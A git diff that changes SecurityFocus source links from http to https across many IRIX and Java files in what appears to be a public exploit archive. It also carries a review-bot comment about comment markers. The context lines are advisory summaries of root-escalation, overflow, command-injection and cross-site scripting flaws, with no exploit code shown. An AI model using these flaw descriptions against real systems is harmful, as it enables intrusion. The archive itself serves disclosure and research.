http://www.securityfocus.com/bid/470/info +source: https://www.securityfocus.com/bid/470/info A vulnerability exists in both the Systour and OutOfBox susbsystems included with new installs of IRIX 5.x and 6.x from SGI. This vulnerability allows users on the system to run arbitrary commands as root. diff --git a/exploits/irix/local/19358.txt b/exploits/irix/local/19358.txt index 93d77997d..9c75cdcee 100644 --- a/exploits/irix/local/19358.txt 
+++ b/exploits/irix/local/19358.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/472/info +source: https://www.securityfocus.com/bid/472/info The xfsdump program shipped with Irix 5.x and 6.x from SGI contains a vulnerability which could lead to root compromise. By creating a log file in /usr/tmp called bck.log, a user could create a symbolic link from this file to any file they wish to be created as root. This is turn could be used to compromise the system. diff --git a/exploits/irix/local/19706.sh b/exploits/irix/local/19706.sh index ed58f0c72..5a9a073ec 100755 --- a/exploits/irix/local/19706.sh +++ b/exploits/irix/local/19706.sh @@ -1,5 +1,5 @@ #!/bin/sh -#source: http://www.securityfocus.com/bid/909/info +#source: https://www.securityfocus.com/bid/909/info # #SGI's Irix operating system ships with an X11 application called 'soundplayer' which is used to play .WAV files. It is not setuid root by itself, but can inherit root privileges if called by midikeys (which is setuid on some old IRIX systems). Soundplayer is vulnerable to an input validation problem. When saving a file to disk with soundplayer, if a semicolon is appended to the end of the "proper" or "real" filename input followed by a command to be executed (no spaces), the command will run with the privileges soundplayer has (elevated or not). It is possible to compromise root access locally through exploitation of this vulnerability if soundplayer is executed (then exploited..) through setuid midikeys. # diff --git a/exploits/irix/local/20126.c b/exploits/irix/local/20126.c index 87d7d0225..b3cfce811 100644 --- a/exploits/irix/local/20126.c +++ b/exploits/irix/local/20126.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1526/info +source: https://www.securityfocus.com/bid/1526/info Under certain versions of IRIX, the 'gr_osview' command contains a buffer overflow that local attackers can exploit to gain root privileges. 
diff --git a/exploits/irix/local/20127.c b/exploits/irix/local/20127.c index eba21da40..2ea3aaf3f 100644 --- a/exploits/irix/local/20127.c +++ b/exploits/irix/local/20127.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1527/info +source: https://www.securityfocus.com/bid/1527/info Certain versions of IRIX ship with a version libgl.so which is vulnerable to buffer overflow attacks. This library, libgl.so, is used in conjunction with graphical programs which use OpenGL. As a result a number of programs which utilize libgl.so can be exploited via this problem. The exploit which is in known public circulation at this time uses both gmemusage and gr_osview to exploit this problem. The buffer overflow itself is in how libgl.so handles the $HOME variable is handled (it is not checked for length). Further the programs which receive this $HOME variable from libgl.so further fail to limit it's size resulting in a buffer overflow attack. Should the receiving programs be SUID root (as are both gr_osview and gmemusage) the attacker will gain root access. */ diff --git a/exploits/irix/local/20128.c b/exploits/irix/local/20128.c index 0f3de9fe6..8938c13bd 100644 --- a/exploits/irix/local/20128.c +++ b/exploits/irix/local/20128.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1528/info +source: https://www.securityfocus.com/bid/1528/info Certain versions of IRIX ship with a version of dmplay which is vulnerable to a buffer overflow attack. The program, dmplay, is used to play movie files under IRIX. The problem at hand is the way the program handles the DISPLAY variable for the users X terminal. It does not check bounds and therefore is vulnerable to attack by an overly long user supplied string. */ diff --git a/exploits/irix/local/20129.c b/exploits/irix/local/20129.c index 2ac2ee86f..770b5ac79 100644 --- a/exploits/irix/local/20129.c +++ b/exploits/irix/local/20129.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1529/info +source: https://www.securityfocus.com/bid/1529/info Certain versions of IRIX ship with a version of lpstat which is vulnerable to a buffer overflow attack. The program, lpstat, is used to check the status of the printer being used by the IRIX machine. The problem is in the command line parsing section of the code whereby a user can supply an overly long string and overflow the buffer resulting in a possible root compromise. */ diff --git a/exploits/irix/local/20130.c b/exploits/irix/local/20130.c index 7f81b8778..a88466081 100644 --- a/exploits/irix/local/20130.c +++ b/exploits/irix/local/20130.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1530/info +source: https://www.securityfocus.com/bid/1530/info Certain versions of IRIX ship with a version of inpview that creates files in '/var/tmp/' in an insecure manner and is therefore prone to a race condition. diff --git a/exploits/irix/local/20137.c b/exploits/irix/local/20137.c index cfe12d338..4bfc60d05 100644 --- a/exploits/irix/local/20137.c +++ b/exploits/irix/local/20137.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1540/info +source: https://www.securityfocus.com/bid/1540/info The truncate() system call on a number of versions of the IRIX operating system (with the xfs file system) does not properly check permissions before truncating a file, making it possible for unprivileged users to damage files to which they would otherwise not have write access. Although only versions 6.2, 6.3, and 6.4 are listed as vulnerable other versions may exhibit this behaviour as well. */ diff --git a/exploits/irix/local/20138.c b/exploits/irix/local/20138.c index a7b54c97c..3cf8ccf81 100644 --- a/exploits/irix/local/20138.c +++ b/exploits/irix/local/20138.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1542/info +source: https://www.securityfocus.com/bid/1542/info The mail(1) program, also know as mail_att, is used to read or send email. A buffer overflow condition exists in code that handles the LOGNAME environment variable. This could be exploited to elevate privileges. */ diff --git a/exploits/irix/local/20263.txt b/exploits/irix/local/20263.txt index f3062ed21..25b1af801 100644 --- a/exploits/irix/local/20263.txt +++ b/exploits/irix/local/20263.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1751/info +source: https://www.securityfocus.com/bid/1751/info The IRIX's /usr/lib/desktop/permissions tool is a suid and sgid root applications normally used by users to modify permissions of their files and files they are privileged for. A vulnerability in the permissions tool allows local malicious users to modify the permissions of any file on the system. diff --git a/exploits/irix/local/20804.c b/exploits/irix/local/20804.c index 008516fb4..ecbd88c8b 100644 --- a/exploits/irix/local/20804.c +++ b/exploits/irix/local/20804.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2656/info +// source: https://www.securityfocus.com/bid/2656/info The 'netprint' utility shipped with SGI Irix systems is used to send print jobs to print spoolers on remote hosts. It is installed setuid root by default. diff --git a/exploits/irix/local/20937.c b/exploits/irix/local/20937.c index 4d2772a6f..4127dc35f 100644 --- a/exploits/irix/local/20937.c +++ b/exploits/irix/local/20937.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2887/info +// source: https://www.securityfocus.com/bid/2887/info Performance Co-Pilot (PCP) is a set of services to support system-level performance monitoring developed by SGI. It has traditionally been an IRIX product, however SGI has made it open source and it is now available for Linux systems. 
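Review bot: The `//` added in exploits/irix/local/20937.c covers only the source line; the unchanged context line right after it ("Performance Co-Pilot (PCP) is a set of services ...") is still bare prose at file scope, so the header remains uncommented text in a .c file. The 20804.c hunk just above has the same shape. The neighbouring files in this patch (20138.c, for example) wrap the whole header in `/* ... */`; suggest doing the same here, or leaving the comment marker out and keeping this commit to the http to https change so the diff stays a pure URL rewrite.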
diff --git a/exploits/irix/local/21720.txt b/exploits/irix/local/21720.txt index a47e35cbb..ea6c7d82a 100644 --- a/exploits/irix/local/21720.txt +++ b/exploits/irix/local/21720.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5487/info +source: https://www.securityfocus.com/bid/5487/info fam is a freely available, open source file alteration monitor. It is maintained and distributed by SGI, and will work on the Linux and Unix operating systems. diff --git a/exploits/irix/local/25361.txt b/exploits/irix/local/25361.txt index 1f8fb782f..5a49c92a6 100644 --- a/exploits/irix/local/25361.txt +++ b/exploits/irix/local/25361.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13057/info +source: https://www.securityfocus.com/bid/13057/info gr_osview is reported prone to an information disclosure vulnerability. This issue can help a local attacker to obtain sensitive information such as exposing an administrator's password hash and carrying out other attacks. diff --git a/exploits/irix/local/25362.txt b/exploits/irix/local/25362.txt index 74d8869e4..9d14c27c4 100644 --- a/exploits/irix/local/25362.txt +++ b/exploits/irix/local/25362.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13058/info +source: https://www.securityfocus.com/bid/13058/info A local file overwrite vulnerability affects SGI IRIX. This issue is due to a failure of the affected utility to drop privileges prior to carrying out critical functionality. diff --git a/exploits/irix/remote/19316.c b/exploits/irix/remote/19316.c index 7c0ecff1f..959ccb313 100644 --- a/exploits/irix/remote/19316.c +++ b/exploits/irix/remote/19316.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/412/info +source: https://www.securityfocus.com/bid/412/info A vulnerability has been discovered in the nsd service, as included by SGI in Irix 6.5.x. The vulnerability allows remote users to access potentially sensitive pieces of information, including, but not limited to, NIS map information, shadow password files, and remote connections. */ diff --git a/exploits/irix/remote/19788.pl b/exploits/irix/remote/19788.pl index 1b6b26f11..a12e8f2b7 100755 --- a/exploits/irix/remote/19788.pl +++ b/exploits/irix/remote/19788.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1031/info +source: https://www.securityfocus.com/bid/1031/info The InfoSearch package converts man pages and other documentation into HTML web content. The search form uses infosrch.cgi which does not properly parse user input in the 'fname' variable, allowing commands to be executed at the webserver privilege level by remote web users. diff --git a/exploits/irix/remote/19822.c b/exploits/irix/remote/19822.c index 3efaa191b..44e668690 100644 --- a/exploits/irix/remote/19822.c +++ b/exploits/irix/remote/19822.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1079/info +// source: https://www.securityfocus.com/bid/1079/info A vulnerability exists in SGI's Objectserver service. By exploiting a vulnerability in this service, remote attackers can add root privileged accounts to the system being compromised. While a patch was made available, and IRIX 6.2 systems were thought to be fixed, the patch merely prevented the creation of root accounts, and did nothing to prevent the creation of other accounts. This vulnerability has existed in the wild since 1997, and was well publicized. diff --git a/exploits/irix/remote/19949.c b/exploits/irix/remote/19949.c index d81a93f21..4daa1173f 100644 --- a/exploits/irix/remote/19949.c +++ b/exploits/irix/remote/19949.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1234/info +// source: https://www.securityfocus.com/bid/1234/info A buffer overflow exists in the version of Mattel's Cyber Patrol software integrated in to Network Associates Gauntlet firewall, versions 4.1, 4.2, 5.0 and 5.5. Due to the manner in which Cyber Patrol was integrated, a vulnerability was introduced which could allow a remote attacker to gain root access on the firewall, or execute arbitrary commands on the firewall. diff --git a/exploits/irix/remote/20149.c b/exploits/irix/remote/20149.c index 02beaf2b2..1a0d4cd9e 100644 --- a/exploits/irix/remote/20149.c +++ b/exploits/irix/remote/20149.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1572/info +// source: https://www.securityfocus.com/bid/1572/info A vulnerability exists in the telnet daemon shipped with Irix versions 6.2 through 6.5.8, and in patched versions of the telnet daemon in Irix 5.2 through 6.1, from Silicon Graphics (SGI). The telnetd will blindly use data passed by the user in such a way as to make it possible for a remote attacker to execute arbitrary commands with the privileges of the daemon. In the case of the telnet daemon, this is root privileges. diff --git a/exploits/irix/remote/20805.c b/exploits/irix/remote/20805.c index 743be17f1..c3c1e89f0 100644 --- a/exploits/irix/remote/20805.c +++ b/exploits/irix/remote/20805.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2658/info +// source: https://www.securityfocus.com/bid/2658/info routed is a daemon used to dynamically update network routing tables. Certain operating systems (including IRIX 3.x up to 6.4 inclusive, Caldera OpenLinux 1.0 and 1.1) contain a routed version which allows attackers to write limited data to arbitrary files, with root privileges. routed communicates using the Routing Information Protocol (RIP - RFC1058, RFC1723). An obsolete command specified by this protocol is "traceon," which turns on certain debugging features and logs information to a file specified in the RIP packet. diff --git a/exploits/irix/remote/21571.c b/exploits/irix/remote/21571.c index 2537de340..340500064 100644 --- a/exploits/irix/remote/21571.c +++ b/exploits/irix/remote/21571.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5075/info +// source: https://www.securityfocus.com/bid/5075/info Throghout the implementation of the supported remote procedure calls, the server uses the popen() libc function. When popen() is used, arguments passed to the RPC are included in the command string. These arguments are not sanitized. If shell metacharacters, such as ";" and "|" are embedded in the remotely supplied arguments, additional commands may be executed. These commands will run with root privileges. diff --git a/exploits/java/dos/27882.java b/exploits/java/dos/27882.java index f9e97c9ec..a575f1194 100644 --- a/exploits/java/dos/27882.java +++ b/exploits/java/dos/27882.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17981/info +source: https://www.securityfocus.com/bid/17981/info Sun Java is prone to a remote denial-of-service vulnerability because the application fails to properly handle certain Java applets. diff --git a/exploits/java/dos/32860.txt b/exploits/java/dos/32860.txt index 13e9f518b..809fe90d7 100644 --- a/exploits/java/dos/32860.txt +++ b/exploits/java/dos/32860.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34150/info +source: https://www.securityfocus.com/bid/34150/info Sun Java System Calendar Server is prone to a denial-of-service vulnerability because it fails to handle certain duplicate URI requests. diff --git a/exploits/java/remote/28887.txt b/exploits/java/remote/28887.txt index 7e79f817a..bdc0e3d7a 100644 --- a/exploits/java/remote/28887.txt +++ b/exploits/java/remote/28887.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20832/info +source: https://www.securityfocus.com/bid/20832/info Sun Java System Messenger Express is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/java/remote/30502.txt b/exploits/java/remote/30502.txt index 3cd1ba475..e58d50197 100644 --- a/exploits/java/remote/30502.txt +++ b/exploits/java/remote/30502.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25340/info +source: https://www.securityfocus.com/bid/25340/info The Sun Java Runtime Environment is prone to a remote privilege-escalation vulnerability. diff --git a/exploits/java/webapps/20925.txt b/exploits/java/webapps/20925.txt index 54aba7ce5..d6f7e4e37 100644 --- a/exploits/java/webapps/20925.txt +++ b/exploits/java/webapps/20925.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2868/info +source: https://www.securityfocus.com/bid/2868/info Screaming Media is a provider for custom web content. SiteWare Editor Desktop is the web-based administration tool for managing Screaming Media content. diff --git a/exploits/java/webapps/21543.txt b/exploits/java/webapps/21543.txt index a6fc7dd31..8a53aa203 100644 --- a/exploits/java/webapps/21543.txt +++ b/exploits/java/webapps/21543.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5008/info +source: https://www.securityfocus.com/bid/5008/info Ruslan Communications Builder is a tool designed to assist a user in creating a website. It allows for remote administration through a web interface, and is implemented in Java. diff --git a/exploits/java/webapps/21562.txt b/exploits/java/webapps/21562.txt index f791c1b70..0d58edf8a 100644 --- a/exploits/java/webapps/21562.txt +++ b/exploits/java/webapps/21562.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5035/info +source: https://www.securityfocus.com/bid/5035/info Wolfram Research's webMathematica is a Java based product which allows the inclusion of Mathematica content in a web environment. It includes CGI programs which generate image content based on user supplied input. diff --git a/exploits/java/webapps/21879.txt b/exploits/java/webapps/21879.txt index c6329bd3c..88373a6eb 100644 --- a/exploits/java/webapps/21879.txt +++ b/exploits/java/webapps/21879.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5828/info +source: https://www.securityfocus.com/bid/5828/info A vulnerability has been reported for the Sun ONE Starter Kit 2.0 and ASTAware SearchDisc. The Starter Kit includes a search engine facility provided for easy information retrieval. The search engine included with the Starter Kit is a modified version of ASTAWare SearchDisc. Reportedly, the search engine is vulnerable to directory traversal attacks. diff --git a/exploits/java/webapps/21946.txt b/exploits/java/webapps/21946.txt index afc5c1f61..5f50d2ac6 100644 --- a/exploits/java/webapps/21946.txt +++ b/exploits/java/webapps/21946.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5997/info +source: https://www.securityfocus.com/bid/5997/info vBulletin does not filter HTML tags from URI parameters, making it prone to cross-site scripting attacks. 
diff --git a/exploits/java/webapps/22752.txt b/exploits/java/webapps/22752.txt index 10f90b16a..9b4370745 100644 --- a/exploits/java/webapps/22752.txt +++ b/exploits/java/webapps/22752.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7855/info +source: https://www.securityfocus.com/bid/7855/info H-Sphere is prone to multiple cross-site scripting vulnerabilities via the HTML template feature in the Hosting Control Panel. HTML and script code will not be filtered from pages which are generated when a request for an invalid or unknown template is made. diff --git a/exploits/java/webapps/23268.txt b/exploits/java/webapps/23268.txt index f4d3c8e23..f89fce960 100644 --- a/exploits/java/webapps/23268.txt +++ b/exploits/java/webapps/23268.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8862/info +source: https://www.securityfocus.com/bid/8862/info Vivisimo Clustering Engine reported prone to cross-site scripting vulnerability. The problem occurs due to insufficient sanitization of parameters passed to the search script. As a result, an attacker may be capable of constructing a link designed to execute arbitrary script code within the browser of a user who follows it. diff --git a/exploits/java/webapps/24190.txt b/exploits/java/webapps/24190.txt index 739c497ec..e901792c7 100644 --- a/exploits/java/webapps/24190.txt +++ b/exploits/java/webapps/24190.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10524/info +source: https://www.securityfocus.com/bid/10524/info PHP-Nuke is prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application: diff --git a/exploits/java/webapps/25702.txt b/exploits/java/webapps/25702.txt index 52a18c523..9522b2182 100644 --- a/exploits/java/webapps/25702.txt +++ b/exploits/java/webapps/25702.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13753/info +source: https://www.securityfocus.com/bid/13753/info Sun JavaMail is prone to multiple information disclosure vulnerabilities. The issues exist due to a lack of sufficient input sanitization performed on user-supplied requests. The following issues are reported: diff --git a/exploits/java/webapps/26001.txt b/exploits/java/webapps/26001.txt index 9e11e259f..fbb7489c5 100644 --- a/exploits/java/webapps/26001.txt +++ b/exploits/java/webapps/26001.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14310/info +source: https://www.securityfocus.com/bid/14310/info Novell GroupWise WebAccess is prone to an HTML injection vulnerability. This may be used to inject hostile HTML and script code into the Web mail application. When a user opens an email containing the hostile code, it may be rendered in their browser. diff --git a/exploits/java/webapps/26987.txt b/exploits/java/webapps/26987.txt index 4292135ee..f522141f5 100644 --- a/exploits/java/webapps/26987.txt +++ b/exploits/java/webapps/26987.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16073/info +source: https://www.securityfocus.com/bid/16073/info FatWire UpdateEngine is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/java/webapps/27888.txt b/exploits/java/webapps/27888.txt index 4ffc60ba6..32f731d24 100644 --- a/exploits/java/webapps/27888.txt +++ b/exploits/java/webapps/27888.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18007/info +source: https://www.securityfocus.com/bid/18007/info Resin is prone to an information-disclosure vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/28116.txt b/exploits/java/webapps/28116.txt index 37aec2453..3575afd99 100644 --- a/exploits/java/webapps/28116.txt +++ b/exploits/java/webapps/28116.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18677/info +source: https://www.securityfocus.com/bid/18677/info H-Sphere is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/30271.txt b/exploits/java/webapps/30271.txt index 9c20901d3..efe019f95 100644 --- a/exploits/java/webapps/30271.txt +++ b/exploits/java/webapps/30271.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24767/info +source: https://www.securityfocus.com/bid/24767/info OpManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/30272.txt b/exploits/java/webapps/30272.txt index 056a73ca6..79881ba02 100644 --- a/exploits/java/webapps/30272.txt +++ b/exploits/java/webapps/30272.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24767/info +source: https://www.securityfocus.com/bid/24767/info OpManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/30273.txt b/exploits/java/webapps/30273.txt index 30ccf0293..e1127fc69 100644 --- a/exploits/java/webapps/30273.txt +++ b/exploits/java/webapps/30273.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24767/info +source: https://www.securityfocus.com/bid/24767/info OpManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/30274.txt b/exploits/java/webapps/30274.txt index fe2302a90..fb376981c 100644 --- a/exploits/java/webapps/30274.txt +++ b/exploits/java/webapps/30274.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24767/info +source: https://www.securityfocus.com/bid/24767/info OpManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/30275.txt b/exploits/java/webapps/30275.txt index 712550978..cf94c2216 100644 --- a/exploits/java/webapps/30275.txt +++ b/exploits/java/webapps/30275.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24767/info +source: https://www.securityfocus.com/bid/24767/info OpManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/30514.txt b/exploits/java/webapps/30514.txt index eef4d08b5..65d87fd71 100644 --- a/exploits/java/webapps/30514.txt +++ b/exploits/java/webapps/30514.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25391/info +source: https://www.securityfocus.com/bid/25391/info ALeadSoft Search Engine Builder is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/30674.txt b/exploits/java/webapps/30674.txt index fafd8dfb4..794255947 100644 --- a/exploits/java/webapps/30674.txt +++ b/exploits/java/webapps/30674.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26082/info +source: https://www.securityfocus.com/bid/26082/info Stringbeans Portal is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/31073.html b/exploits/java/webapps/31073.html index a3b0ede4f..0d0dc3add 100644 --- a/exploits/java/webapps/31073.html +++ b/exploits/java/webapps/31073.html 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27490/info +source: https://www.securityfocus.com/bid/27490/info Banner Student is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/java/webapps/31189.txt b/exploits/java/webapps/31189.txt index 15e2e31db..9f3604dc6 100644 --- a/exploits/java/webapps/31189.txt +++ b/exploits/java/webapps/31189.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27775/info +source: https://www.securityfocus.com/bid/27775/info Cisco Unified Communications Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/java/webapps/31438.txt b/exploits/java/webapps/31438.txt index f73f84e92..dfc1e0767 100644 --- a/exploits/java/webapps/31438.txt +++ b/exploits/java/webapps/31438.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28296/info +source: https://www.securityfocus.com/bid/28296/info IBM Rational ClearQuest is prone to multiple cross-site scripting vulnerabilities because it fails to adequately sanitize user-supplied input. diff --git a/exploits/java/webapps/31621.txt b/exploits/java/webapps/31621.txt index fb090bc57..736cf07ee 100644 --- a/exploits/java/webapps/31621.txt +++ b/exploits/java/webapps/31621.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28649/info +source: https://www.securityfocus.com/bid/28649/info Sun Java System Messenger Express is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/31641.txt b/exploits/java/webapps/31641.txt index e93f61883..2eefab531 100644 --- a/exploits/java/webapps/31641.txt +++ b/exploits/java/webapps/31641.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28762/info +source: https://www.securityfocus.com/bid/28762/info Business Objects is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input via the Infoview web portal. diff --git a/exploits/java/webapps/31816.txt b/exploits/java/webapps/31816.txt index 99811fc37..045b0bfe5 100644 --- a/exploits/java/webapps/31816.txt +++ b/exploits/java/webapps/31816.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29317/info +source: https://www.securityfocus.com/bid/29317/info SAP Web Application Server is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/java/webapps/32448.txt b/exploits/java/webapps/32448.txt index cf56295bf..ccfd48240 100644 --- a/exploits/java/webapps/32448.txt +++ b/exploits/java/webapps/32448.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31514/info +source: https://www.securityfocus.com/bid/31514/info Celoxis is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/32459.txt b/exploits/java/webapps/32459.txt index 69a556ae7..66c67e25e 100644 --- a/exploits/java/webapps/32459.txt +++ b/exploits/java/webapps/32459.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31580/info +source: https://www.securityfocus.com/bid/31580/info Kontiki Delivery Management System is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/java/webapps/32574.txt b/exploits/java/webapps/32574.txt index 16a3df3ea..5d0b7ee49 100644 --- a/exploits/java/webapps/32574.txt +++ b/exploits/java/webapps/32574.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32208/info +source: https://www.securityfocus.com/bid/32208/info MoinMoin is prone to cross-site scripting and information-disclosure vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/32818.txt b/exploits/java/webapps/32818.txt index 35df12419..4f6297470 100644 --- a/exploits/java/webapps/32818.txt +++ b/exploits/java/webapps/32818.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33912/info +source: https://www.securityfocus.com/bid/33912/info JOnAS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/32821.html b/exploits/java/webapps/32821.html index b2d5f8c9b..d37c90a7d 100644 --- a/exploits/java/webapps/32821.html +++ b/exploits/java/webapps/32821.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33924/info +source: https://www.securityfocus.com/bid/33924/info APC PowerChute Network Shutdown is prone to an HTTP-response-splitting vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/32858.txt b/exploits/java/webapps/32858.txt index 49aadec73..70c259497 100644 --- a/exploits/java/webapps/32858.txt +++ b/exploits/java/webapps/32858.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34140/info +source: https://www.securityfocus.com/bid/34140/info Sun Java System Messenger Express is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/32862.txt b/exploits/java/webapps/32862.txt index 7a7702d06..878131563 100644 --- a/exploits/java/webapps/32862.txt +++ b/exploits/java/webapps/32862.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34153/info +source: https://www.securityfocus.com/bid/34153/info Sun Java System Calendar Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/java/webapps/32863.txt b/exploits/java/webapps/32863.txt index 75c7e85e2..0ee78716c 100644 --- a/exploits/java/webapps/32863.txt +++ b/exploits/java/webapps/32863.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34154/info +source: https://www.securityfocus.com/bid/34154/info Sun Java System Communications Express is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/java/webapps/32864.txt b/exploits/java/webapps/32864.txt index 10683a874..c60570dc1 100644 --- a/exploits/java/webapps/32864.txt +++ b/exploits/java/webapps/32864.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34155/info +source: https://www.securityfocus.com/bid/34155/info Sun Java System Communications Express is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/java/webapps/32897.txt b/exploits/java/webapps/32897.txt index ec99800c0..6fcb1a219 100644 --- a/exploits/java/webapps/32897.txt +++ b/exploits/java/webapps/32897.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34454/info +source: https://www.securityfocus.com/bid/34454/info Cisco Subscriber Edge Services Manager is prone to a cross-site scripting vulnerability and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/java/webapps/32909.txt b/exploits/java/webapps/32909.txt index 7d0cd220d..ea51932e4 100644 --- a/exploits/java/webapps/32909.txt +++ b/exploits/java/webapps/32909.txt 
